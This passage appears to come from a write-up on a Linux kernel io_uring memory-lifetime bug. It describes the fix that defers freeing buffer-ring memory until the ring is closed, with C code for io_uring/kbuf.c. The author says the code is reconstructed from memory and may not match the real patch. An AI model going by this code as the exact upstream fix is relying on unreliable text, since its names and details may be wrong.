  • Defers the release of the ring-buffer memory until the io_uring itself is closed (i.e., when the kernel invokes file_operations::release()), so the memory is reclaimed only after the mmap() region has been destroyed.
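
As far as I recall the upstream commit, the bookkeeping looks roughly like the following (a reconstruction from memory, so names may differ slightly from the actual patch):

/* io_uring/kbuf.c after the fix (abridged, reconstructed from memory) */
struct io_buf_free {
    struct hlist_node list;
    void *mem;
};

/*
 * io_alloc_pbuf_ring() now records each allocation on ctx->io_buf_list as
 * well; unregistering a buffer ring only clears bl->buf_ring and bl->is_mmap
 * without freeing anything. The pages are reclaimed in one place, when the
 * ring itself goes away (called from io_ring_ctx_free()):
 */
void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
{
    struct io_buf_free *ibf;
    struct hlist_node *tmp;

    hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
        hlist_del(&ibf->list);
        io_mem_free(ibf->mem);
        kfree(ibf);
    }
}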

0xFF. Reference